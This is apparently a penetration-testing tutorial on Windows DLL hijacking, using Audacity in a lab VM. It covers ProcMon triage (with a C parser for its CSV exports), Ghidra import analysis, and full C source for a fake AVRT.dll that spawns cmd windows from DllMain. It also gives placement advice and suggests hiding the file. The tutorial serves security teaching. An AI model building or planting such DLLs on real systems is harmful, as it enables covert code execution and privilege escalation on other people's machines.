|
Microsoft has shipped several mitigations for DLL hijacking, most notably SafeDllSearchMode (enabled by default since Windows XP SP2). It changes the order in which Windows searches for a DLL: the current working directory is moved from second place to after the system directories, so a DLL planted in the directory a user happens to open a file from can no longer shadow a DLL that exists in System32. It does nothing about the application's own directory, which is still searched first, so it limits the technique rather than removing it.
|
|
Cases in which it is still possible to hijack a DLL are:
|
|
* The application tries to load a DLL that isn't present on the system (a missing DLL sometimes crashes the program, but often the DLL is optional), or one that exists only in a directory that is searched after a directory you can write to.
|
|
* The application's directory isn't permission-protected (this is why most Windows installers put programs under C:\Program Files or C:\Program Files (x86), where standard users cannot write).
|
|
|
|
|
|
## Walk-through
|
|
|
|
|
|
|
|
##### This section is a walk-through of finding vulnerable programs and hijacking a DLL they load to get code execution in their context (and privilege escalation when the program runs with more rights than the user who can write to its directory).
|
|
|
|
|
|
|
|
The easiest way to find a vulnerable program is to search a CVE database.
|
|
|
|
For this walk-through I used https://cve.mitre.org/ and looked for commonly used programs that have been reported as susceptible to DLL hijacking.
|
|
|
|
I settled on Audacity, an open-source audio editor, as the target.
|
|
|
|
|
|
|
|

|
|
|
|
|
|
|
|
I set up a Windows 10 VM and installed Audacity to a folder on the desktop (there you don't need elevated privileges to move or rename files). To find what a program loads from the file system you can use a free tool from Microsoft Sysinternals called Process Monitor, or ProcMon for short.
|
|
|
|
|
|
|
|

|
|
|
|
|
|
|
|
ProcMon records which DLL files a program tries to load and whether each load succeeds. Start ProcMon, then start the program you are testing. The best DLLs to target are the ones the program tries to load but cannot find. A ProcMon filter makes these easy to spot (if there are any): Process Name is the target executable, Operation is CreateFile, Result is NAME NOT FOUND, and Path ends with .dll.
|
|
|
|
|
|
|
|

|
|
|
|
|
|
|
|
The result of the filter should look something like this. Note the directory each DLL is looked for in: lookups in directories that are not system-protected (the application folder, the user's profile, anything a standard user can write to) are your entry points. NAME NOT FOUND hits under C:\Windows or C:\Program Files are not useful unless you can already write there.
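The same triage can be done offline on a ProcMon CSV export (File > Save, CSV format), which is handy when the capture is large. The following is an added example, not part of the original walk-through: it parses the default export columns (Time of Day, Process Name, PID, Operation, Path, Result, Detail), keeps the NAME NOT FOUND lookups of .dll paths for one process, and separates the ones in writable-by-default locations from the ones under protected directories. The sample rows are constructed to mimic ProcMon's format, and the Desktop path is invented rather than taken from the author's VM.

```c
/* procmon_triage.c: find DLL hijack candidates in a ProcMon CSV export.
 * Added example (not the page's code). Build: cc -o procmon_triage procmon_triage.c */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAX_FIELD 512

/* Copy one CSV field (optionally double-quoted, no embedded quotes) into out.
 * Returns a pointer just past the field's trailing comma, or NULL at end of line. */
static const char *next_field(const char *p, char *out, size_t cap)
{
    size_t n = 0;
    if (*p == '"') {
        p++;
        while (*p && *p != '"') { if (n + 1 < cap) out[n++] = *p; p++; }
        if (*p == '"') p++;
    } else {
        while (*p && *p != ',' && *p != '\r' && *p != '\n') { if (n + 1 < cap) out[n++] = *p; p++; }
    }
    out[n] = '\0';
    return (*p == ',') ? p + 1 : NULL;
}

/* Case-insensitive prefix / suffix tests (Windows paths are case-insensitive). */
static int istarts(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (!*s || tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return 0;
    return 1;
}
static int iends(const char *s, const char *suffix)
{
    size_t ls = strlen(s), lx = strlen(suffix);
    return ls >= lx && istarts(s + ls - lx, suffix);
}

/* Directories a standard user cannot write to by default. A missing DLL that is
 * only looked for here is not a hijack point without admin rights. */
static const char *PROTECTED_DIRS[] = {
    "C:\\Windows\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\"
};
static int in_protected_dir(const char *path)
{
    for (size_t i = 0; i < sizeof PROTECTED_DIRS / sizeof *PROTECTED_DIRS; i++)
        if (istarts(path, PROTECTED_DIRS[i])) return 1;
    return 0;
}

/* Classify one export row for the given process name.
 * 2 = candidate (missing .dll in a non-protected directory)
 * 1 = missing .dll, but in a protected directory
 * 0 = not interesting (other process, found, or not a DLL lookup) */
int classify_line(const char *line, const char *process, char *path_out, size_t cap)
{
    char skip[MAX_FIELD], proc[MAX_FIELD], op[MAX_FIELD], path[MAX_FIELD], result[MAX_FIELD];
    const char *p = line;
    if (!(p = next_field(p, skip, sizeof skip))) return 0;     /* Time of Day */
    if (!(p = next_field(p, proc, sizeof proc))) return 0;     /* Process Name */
    if (!(p = next_field(p, skip, sizeof skip))) return 0;     /* PID */
    if (!(p = next_field(p, op, sizeof op))) return 0;         /* Operation */
    if (!(p = next_field(p, path, sizeof path))) return 0;     /* Path */
    next_field(p, result, sizeof result);                      /* Result (Detail follows) */
    if (strcmp(proc, process) != 0) return 0;
    if (strcmp(op, "CreateFile") != 0 || strcmp(result, "NAME NOT FOUND") != 0) return 0;
    if (!iends(path, ".dll")) return 0;
    if (path_out) { strncpy(path_out, path, cap - 1); path_out[cap - 1] = '\0'; }
    return in_protected_dir(path) ? 1 : 2;
}

/* Constructed sample rows in ProcMon's CSV export layout (not a real capture). */
static const char *SAMPLE[] = {
    "\"Time of Day\",\"Process Name\",\"PID\",\"Operation\",\"Path\",\"Result\",\"Detail\"",
    "\"12:00:01.0000001 PM\",\"audacity.exe\",\"4120\",\"CreateFile\",\"C:\\Users\\lab\\Desktop\\audacity\\AVRT.dll\",\"NAME NOT FOUND\",\"Desired Access: Read Attributes, Disposition: Open\"",
    "\"12:00:01.0000002 PM\",\"audacity.exe\",\"4120\",\"CreateFile\",\"C:\\Windows\\System32\\AVRT.dll\",\"SUCCESS\",\"Desired Access: Read Attributes, Disposition: Open\"",
    "\"12:00:01.0000003 PM\",\"audacity.exe\",\"4120\",\"CreateFile\",\"C:\\Users\\lab\\Desktop\\audacity\\CRYPTBASE.dll\",\"NAME NOT FOUND\",\"Desired Access: Read Attributes, Disposition: Open\"",
    "\"12:00:01.0000004 PM\",\"audacity.exe\",\"4120\",\"CreateFile\",\"C:\\Windows\\System32\\notreal.dll\",\"NAME NOT FOUND\",\"Desired Access: Read Attributes, Disposition: Open\"",
    "\"12:00:01.0000005 PM\",\"explorer.exe\",\"1234\",\"CreateFile\",\"C:\\Users\\lab\\Desktop\\audacity\\other.dll\",\"NAME NOT FOUND\",\"Desired Access: Read Attributes, Disposition: Open\"",
    NULL
};

/* Print every candidate row for a process and return how many there were. */
int count_candidates(const char *process)
{
    int n = 0;
    char path[MAX_FIELD];
    for (int i = 0; SAMPLE[i]; i++)
        if (classify_line(SAMPLE[i], process, path, sizeof path) == 2) {
            printf("candidate: %s\n", path);
            n++;
        }
    return n;
}
```

Replace the SAMPLE table with a loop over `fgets` on the exported file to run it on a real capture. The AVRT.dll row pair is the interesting pattern: the first lookup in the application folder fails, then the copy in System32 is found, which is exactly the case where a file dropped in the application folder wins.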
|
|
|
|
|
|
|
|

|
|
|
|
|
|
|
|
Of those I settled on AVRT.dll. I suggest waiting until you know which functions the program calls from the DLL before choosing: programs rely on some DLLs more than others, and the easiest to implement are the ones with the fewest imported functions. Note that AVRT.dll is not missing from the system, it lives in C:\Windows\System32; it is still hijackable because the application's own directory is searched before System32, so a copy placed next to audacity.exe is found first. ProcMon doesn't tell you which functions a program needs from a DLL, so the next step is to open the executable in Ghidra (or run `dumpbin /imports audacity.exe` from a Visual Studio developer prompt) to list the imports.
|
|
|
|
|
|
|
|

|
|
|
|
|
|
|
|
After Ghidra finishes analysing the program you should have a Symbol Tree on the left. Under the Imports folder is a listing of the DLLs in the import table and the functions imported from each. In the image above, for example, you can see that Audacity imports RegOpenKeyExA and RegQueryValueExA from ADVAPI32.DLL. **When making a fake DLL you MUST export at least every function the program imports from it.** Otherwise the loader cannot resolve the import, reports that the procedure entry point could not be located, and the process never starts, so you get no code execution. The functions don't have to do anything useful (you can put extra code in them), they just need to exist under the expected export name; for a 32-bit build that means an undecorated name, which a .def file takes care of.
|
|
|
|
|
|
|
|
Weirdly enough, AVRT.dll doesn't appear in Audacity's import table at all, which means it is loaded at run time (for example with LoadLibrary) rather than at process start. That's fine: as long as the DLL gets loaded, DllMain runs and we get code execution, and there are no imports to satisfy.
|
|
|
|
|
|
|
|
Now that we have the target DLL and the functions that are called, it's time to make a fake DLL to replace it. The easiest tool is Visual Studio: create a Dynamic-Link Library project and it starts you with the basic DllMain skeleton. Build it for the same architecture (x86 or x64) as the target process, or the loader will refuse it.
|
|
|
|
|
|
|
|
My custom AVRT.dll looks something like this:
|
|
|
|

|
|
|
|
|
|
|
|
This DLL spawns a new cmd window every 5 seconds while Audacity is open. It's more annoying than malicious, but you could just as well make any system call or run a PowerShell script this way. DllMain is the entry point the loader calls with a reason code; DLL_PROCESS_ATTACH is the reason passed when the DLL is first mapped into the process, so code placed there runs on load. Keep that code short: DllMain runs while the loader lock is held, so anything long-running or blocking (such as a 5-second loop) belongs in a separate thread started from DllMain.
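The source in the screenshot is not reproduced on the page, so here is an added example of the same idea (my code, not the author's): a fake AVRT.dll whose DllMain starts a thread that opens a cmd window every 5 seconds. The two exported names are real AVRT.dll functions, included as stubs for the case where a target imports them (Audacity does not). The file name avrt_hijack.c and the build command are assumptions; the non-Windows shim exists only so the file can be compiled and inspected on another host and carries no payload.

```c
/* avrt_hijack.c: fake AVRT.dll for the walk-through (added example, not the
 * page's own code). Build from a Visual Studio developer prompt for the same
 * architecture as the target, e.g. x64:  cl /LD avrt_hijack.c /Fe:AVRT.dll
 * On x86 add a .def file with EXPORTS for the two stubs so the names are not
 * decorated as _Name@N. */
#ifdef _WIN32
#include <windows.h>
#include <process.h>
#define EXPORT __declspec(dllexport)
#else
/* Shim so the file also compiles on a non-Windows host; no payload here. */
#include <stddef.h>
typedef void *HANDLE; typedef void *HINSTANCE; typedef void *LPVOID;
typedef int BOOL; typedef unsigned long DWORD; typedef DWORD *LPDWORD;
typedef const wchar_t *LPCWSTR;
#define WINAPI
#define EXPORT
#define TRUE 1
#define FALSE 0
#define DLL_PROCESS_ATTACH 1
#endif

#ifdef _WIN32
/* Payload thread: pop a new console every 5 seconds for as long as the host
 * process lives. Runs outside DllMain so the loader lock is never held here. */
static unsigned __stdcall payload_thread(void *arg)
{
    (void)arg;
    for (;;) {
        STARTUPINFOA si;
        PROCESS_INFORMATION pi;
        char cmdline[] = "cmd.exe";            /* CreateProcess may modify this buffer */
        ZeroMemory(&si, sizeof si);
        si.cb = sizeof si;
        if (CreateProcessA(NULL, cmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE,
                           NULL, NULL, &si, &pi)) {
            CloseHandle(pi.hThread);
            CloseHandle(pi.hProcess);
        }
        Sleep(5000);
    }
    return 0;
}
#endif

/* Stub exports with the real AVRT.dll signatures. Each returns the documented
 * failure value, so a caller that checks the result degrades instead of crashing. */
EXPORT HANDLE WINAPI AvSetMmThreadCharacteristicsW(LPCWSTR task_name, LPDWORD task_index)
{
    (void)task_name;
    if (task_index) *task_index = 0;
    return NULL;
}

EXPORT BOOL WINAPI AvRevertMmThreadCharacteristics(HANDLE avrt_handle)
{
    (void)avrt_handle;
    return FALSE;
}

/* Loader entry point. DLL_PROCESS_ATTACH fires once, when the DLL is mapped
 * into the process; the payload is handed to a thread and DllMain returns. */
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved)
{
    (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {
#ifdef _WIN32
        DisableThreadLibraryCalls(hinst);   /* no per-thread attach/detach calls needed */
        _beginthreadex(NULL, 0, payload_thread, NULL, 0, NULL);
#else
        (void)hinst;
#endif
    }
    return TRUE;
}
```

For a target that does import from the hijacked DLL, add one stub per imported name the same way; `dumpbin /exports` on the real System32 copy gives the full list of names and signatures to copy from.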
|
|
|
|
|
|
|
|
After writing the code, build the DLL in VS. Then rename it to the target name (AVRT.dll) and drop it in a directory the program searches before the real copy; the safest bet is the same folder as the program's executable, since the application directory is searched first.
|
|
|
|

|
|
|
|
|
|
|
|
Notice how the DLL doesn't stand out: it looks just like any other DLL packaged with the program. You can even use OS features such as the hidden file attribute to hide it further. Now that everything is set up, it's time to run the program and see whether the DLL's code executes. If it doesn't, rerun ProcMon: the AVRT.dll lookup in the application folder should now show SUCCESS followed by a Load Image event for your file. A lookup that still says NAME NOT FOUND means the wrong name or directory; a file that is found but never followed by Load Image was rejected, most commonly because it was built for the wrong architecture.
|
|
|
|
|
|
|
|

|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Sources:
|
|
https://hacknpentest.com/windows-privilege-escalation-dll-hijacking/